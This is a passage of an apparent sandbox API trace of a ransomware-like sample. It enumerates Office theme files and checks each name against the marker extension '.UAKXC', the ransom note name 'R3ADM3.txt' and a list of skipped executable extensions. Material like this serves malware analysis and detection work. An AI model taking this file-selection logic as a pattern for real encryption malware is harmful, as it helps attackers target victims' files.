ftCreationTime.dwLowDateTime=0x6a20e000, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5a01840, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6a20e000, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x8ad4d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Composite.thmx", cAlternateFileName="COMPOS~1.THM")) returned 1 [0158.283] lstrcmpW (lpString1="Composite.thmx", lpString2=".") returned 1 [0158.283] lstrcmpW (lpString1="Composite.thmx", lpString2="..") returned 1 [0158.283] StrStrIW (lpFirst="Composite.thmx", lpSrch=".UAKXC") returned 0x0 [0158.283] StrStrIW (lpFirst="Composite.thmx", lpSrch=".exe") returned 0x0 [0158.283] StrStrIW (lpFirst="Composite.thmx", lpSrch=".dll") returned 0x0 [0158.283] StrStrIW (lpFirst="Composite.thmx", lpSrch=".lnk") returned 0x0 [0158.283] StrStrIW (lpFirst="Composite.thmx", lpSrch=".sys") returned 0x0 [0158.283] StrStrIW (lpFirst="Composite.thmx", lpSrch=".msi") returned 0x0 [0158.283] StrStrIW (lpFirst="Composite.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.283] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21268 [0158.283] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.283] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.283] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.283] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.283] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.283] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21268 | out: hHeap=0xea0000) returned 1 [0158.283] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.283] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21268 [0158.283] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeee020 [0158.284] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.284] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.284] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8607600, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5a279a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8607600, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1240d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Concourse.thmx", cAlternateFileName="CONCOU~1.THM")) returned 1 [0158.284] lstrcmpW (lpString1="Concourse.thmx", lpString2=".") returned 1 [0158.284] lstrcmpW (lpString1="Concourse.thmx", lpString2="..") returned 1 [0158.284] StrStrIW (lpFirst="Concourse.thmx", lpSrch=".UAKXC") returned 0x0 [0158.284] StrStrIW (lpFirst="Concourse.thmx", lpSrch=".exe") returned 0x0 [0158.284] StrStrIW (lpFirst="Concourse.thmx", lpSrch=".dll") returned 0x0 [0158.284] StrStrIW (lpFirst="Concourse.thmx", lpSrch=".lnk") returned 0x0 [0158.284] StrStrIW (lpFirst="Concourse.thmx", lpSrch=".sys") returned 0x0 [0158.284] StrStrIW (lpFirst="Concourse.thmx", lpSrch=".msi") returned 0x0 [0158.284] StrStrIW (lpFirst="Concourse.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.284] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21290 [0158.284] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.284] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.284] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.284] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.284] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.284] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21290 | out: hHeap=0xea0000) returned 1 [0158.284] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.284] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21290 [0158.284] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeee0b8 [0158.285] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.285] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.285] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee59400, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5a99dc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6ee59400, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1e92c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Couture.thmx", cAlternateFileName="COUTUR~1.THM")) returned 1 [0158.285] lstrcmpW (lpString1="Couture.thmx", lpString2=".") returned 1 [0158.285] lstrcmpW (lpString1="Couture.thmx", lpString2="..") returned 1 [0158.285] StrStrIW (lpFirst="Couture.thmx", lpSrch=".UAKXC") returned 0x0 [0158.285] StrStrIW (lpFirst="Couture.thmx", lpSrch=".exe") returned 0x0 [0158.285] StrStrIW (lpFirst="Couture.thmx", lpSrch=".dll") returned 0x0 [0158.285] StrStrIW (lpFirst="Couture.thmx", lpSrch=".lnk") returned 0x0 [0158.285] StrStrIW (lpFirst="Couture.thmx", lpSrch=".sys") returned 0x0 [0158.285] StrStrIW (lpFirst="Couture.thmx", lpSrch=".msi") returned 0x0 [0158.285] StrStrIW (lpFirst="Couture.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.285] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf212b8 [0158.285] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.285] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.285] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.285] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.285] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.285] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf212b8 | out: hHeap=0xea0000) returned 1 [0158.285] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.285] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf212b8 [0158.285] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeee150 [0158.285] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.285] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.286] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73aa4800, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5a99dc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x73aa4800, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x555df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Elemental.thmx", cAlternateFileName="ELEMEN~1.THM")) returned 1 [0158.286] lstrcmpW (lpString1="Elemental.thmx", lpString2=".") returned 1 [0158.286] lstrcmpW (lpString1="Elemental.thmx", lpString2="..") returned 1 [0158.286] StrStrIW (lpFirst="Elemental.thmx", lpSrch=".UAKXC") returned 0x0 [0158.286] StrStrIW (lpFirst="Elemental.thmx", lpSrch=".exe") returned 0x0 [0158.286] StrStrIW (lpFirst="Elemental.thmx", lpSrch=".dll") returned 0x0 [0158.286] StrStrIW (lpFirst="Elemental.thmx", lpSrch=".lnk") returned 0x0 [0158.286] StrStrIW (lpFirst="Elemental.thmx", lpSrch=".sys") returned 0x0 [0158.286] StrStrIW (lpFirst="Elemental.thmx", lpSrch=".msi") returned 0x0 [0158.286] StrStrIW (lpFirst="Elemental.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.286] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf212e0 [0158.286] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.286] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.286] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.286] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.286] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.286] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf212e0 | out: hHeap=0xea0000) returned 1 [0158.286] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.286] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf212e0 [0158.286] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeee1e8 [0158.286] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.286] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.286] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2d000, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5abff20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xac2d000, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x10f61, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Equity.thmx", cAlternateFileName="EQUITY~1.THM")) returned 1 [0158.287] lstrcmpW (lpString1="Equity.thmx", lpString2=".") returned 1 [0158.287] lstrcmpW (lpString1="Equity.thmx", lpString2="..") returned 1 [0158.287] StrStrIW (lpFirst="Equity.thmx", lpSrch=".UAKXC") returned 0x0 [0158.287] StrStrIW (lpFirst="Equity.thmx", lpSrch=".exe") returned 0x0 [0158.287] StrStrIW (lpFirst="Equity.thmx", lpSrch=".dll") returned 0x0 [0158.287] StrStrIW (lpFirst="Equity.thmx", lpSrch=".lnk") returned 0x0 [0158.287] StrStrIW (lpFirst="Equity.thmx", lpSrch=".sys") returned 0x0 [0158.287] StrStrIW (lpFirst="Equity.thmx", lpSrch=".msi") returned 0x0 [0158.287] StrStrIW (lpFirst="Equity.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.287] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21308 [0158.287] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.287] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.287] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.287] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.287] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.287] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21308 | out: hHeap=0xea0000) returned 1 [0158.287] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.287] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21308 [0158.287] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeee280 [0158.287] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.287] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.287] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x478ec700, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5abff20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x478ec700, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xc278, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Essential.thmx", cAlternateFileName="ESSENT~1.THM")) returned 1 [0158.287] lstrcmpW (lpString1="Essential.thmx", lpString2=".") returned 1 [0158.287] lstrcmpW (lpString1="Essential.thmx", lpString2="..") returned 1 [0158.288] StrStrIW (lpFirst="Essential.thmx", lpSrch=".UAKXC") returned 0x0 [0158.288] StrStrIW (lpFirst="Essential.thmx", lpSrch=".exe") returned 0x0 [0158.288] StrStrIW (lpFirst="Essential.thmx", lpSrch=".dll") returned 0x0 [0158.288] StrStrIW (lpFirst="Essential.thmx", lpSrch=".lnk") returned 0x0 [0158.288] StrStrIW (lpFirst="Essential.thmx", lpSrch=".sys") returned 0x0 [0158.288] StrStrIW (lpFirst="Essential.thmx", lpSrch=".msi") returned 0x0 [0158.288] StrStrIW (lpFirst="Essential.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.288] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21330 [0158.288] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.288] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.288] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.288] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.288] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.288] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21330 | out: hHeap=0xea0000) returned 1 [0158.288] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.288] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21330 [0158.288] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf340d0 [0158.289] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.289] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.289] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x773dcf00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5ae6080, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x773dcf00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xd748, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Executive.thmx", cAlternateFileName="EXECUT~1.THM")) returned 1 [0158.289] lstrcmpW (lpString1="Executive.thmx", lpString2=".") returned 1 [0158.289] lstrcmpW (lpString1="Executive.thmx", lpString2="..") returned 1 [0158.289] StrStrIW (lpFirst="Executive.thmx", lpSrch=".UAKXC") returned 0x0 [0158.289] StrStrIW (lpFirst="Executive.thmx", lpSrch=".exe") returned 0x0 [0158.289] StrStrIW (lpFirst="Executive.thmx", lpSrch=".dll") returned 0x0 [0158.289] StrStrIW (lpFirst="Executive.thmx", lpSrch=".lnk") returned 0x0 [0158.289] StrStrIW (lpFirst="Executive.thmx", lpSrch=".sys") returned 0x0 [0158.289] StrStrIW (lpFirst="Executive.thmx", lpSrch=".msi") returned 0x0 [0158.289] StrStrIW (lpFirst="Executive.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.289] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21358 [0158.289] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.289] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.289] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.290] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.290] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.290] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21358 | out: hHeap=0xea0000) returned 1 [0158.290] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.290] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21358 [0158.290] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34168 [0158.290] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.290] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.290] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11e9de00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5ae6080, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x11e9de00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x100a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Flow.thmx", cAlternateFileName="FLOW~1.THM")) returned 1 [0158.290] lstrcmpW (lpString1="Flow.thmx", lpString2=".") returned 1 [0158.290] lstrcmpW (lpString1="Flow.thmx", lpString2="..") returned 1 [0158.290] StrStrIW (lpFirst="Flow.thmx", lpSrch=".UAKXC") returned 0x0 [0158.290] StrStrIW (lpFirst="Flow.thmx", lpSrch=".exe") returned 0x0 [0158.290] StrStrIW (lpFirst="Flow.thmx", lpSrch=".dll") returned 0x0 [0158.290] StrStrIW (lpFirst="Flow.thmx", lpSrch=".lnk") returned 0x0 [0158.290] StrStrIW (lpFirst="Flow.thmx", lpSrch=".sys") returned 0x0 [0158.290] StrStrIW (lpFirst="Flow.thmx", lpSrch=".msi") returned 0x0 [0158.290] StrStrIW (lpFirst="Flow.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.290] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21380 [0158.290] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.290] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.290] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.290] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.290] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.290] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21380 | out: hHeap=0xea0000) returned 1 [0158.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21380 [0158.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd080 [0158.291] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.291] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.291] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe565700, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b0c1e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe565700, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xf814, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Foundry.thmx", cAlternateFileName="FOUNDR~1.THM")) returned 1 [0158.291] lstrcmpW (lpString1="Foundry.thmx", lpString2=".") returned 1 [0158.291] lstrcmpW (lpString1="Foundry.thmx", lpString2="..") returned 1 [0158.291] StrStrIW (lpFirst="Foundry.thmx", lpSrch=".UAKXC") returned 0x0 [0158.291] StrStrIW (lpFirst="Foundry.thmx", lpSrch=".exe") returned 0x0 [0158.291] StrStrIW (lpFirst="Foundry.thmx", lpSrch=".dll") returned 0x0 [0158.291] StrStrIW (lpFirst="Foundry.thmx", lpSrch=".lnk") returned 0x0 [0158.291] StrStrIW (lpFirst="Foundry.thmx", lpSrch=".sys") returned 0x0 [0158.291] StrStrIW (lpFirst="Foundry.thmx", lpSrch=".msi") returned 0x0 [0158.291] StrStrIW (lpFirst="Foundry.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf213a8 [0158.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.291] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.291] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.291] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf213a8 | out: hHeap=0xea0000) returned 1 [0158.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.291] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf213a8 [0158.292] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34200 [0158.292] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.292] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.292] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b224e00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b0c1e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4b224e00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xd2e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Grid.thmx", cAlternateFileName="GRID~1.THM")) returned 1 [0158.292] lstrcmpW (lpString1="Grid.thmx", lpString2=".") returned 1 [0158.292] lstrcmpW (lpString1="Grid.thmx", lpString2="..") returned 1 [0158.292] StrStrIW (lpFirst="Grid.thmx", lpSrch=".UAKXC") returned 0x0 [0158.292] StrStrIW (lpFirst="Grid.thmx", lpSrch=".exe") returned 0x0 [0158.292] StrStrIW (lpFirst="Grid.thmx", lpSrch=".dll") returned 0x0 [0158.292] StrStrIW (lpFirst="Grid.thmx", lpSrch=".lnk") returned 0x0 [0158.292] StrStrIW (lpFirst="Grid.thmx", lpSrch=".sys") returned 0x0 [0158.292] StrStrIW (lpFirst="Grid.thmx", lpSrch=".msi") returned 0x0 [0158.292] StrStrIW (lpFirst="Grid.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.292] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf213d0 [0158.292] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.292] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.292] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.292] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.292] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.292] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf213d0 | out: hHeap=0xea0000) returned 1 [0158.292] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.292] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf213d0 [0158.292] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd108 [0158.293] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.293] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.293] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d84a800, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b32340, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4d84a800, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x60041, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hardcover.thmx", cAlternateFileName="HARDCO~1.THM")) returned 1 [0158.293] lstrcmpW (lpString1="Hardcover.thmx", lpString2=".") returned 1 [0158.293] lstrcmpW (lpString1="Hardcover.thmx", lpString2="..") returned 1 [0158.293] StrStrIW (lpFirst="Hardcover.thmx", lpSrch=".UAKXC") returned 0x0 [0158.293] StrStrIW (lpFirst="Hardcover.thmx", lpSrch=".exe") returned 0x0 [0158.293] StrStrIW (lpFirst="Hardcover.thmx", lpSrch=".dll") returned 0x0 [0158.293] StrStrIW (lpFirst="Hardcover.thmx", lpSrch=".lnk") returned 0x0 [0158.293] StrStrIW (lpFirst="Hardcover.thmx", lpSrch=".sys") returned 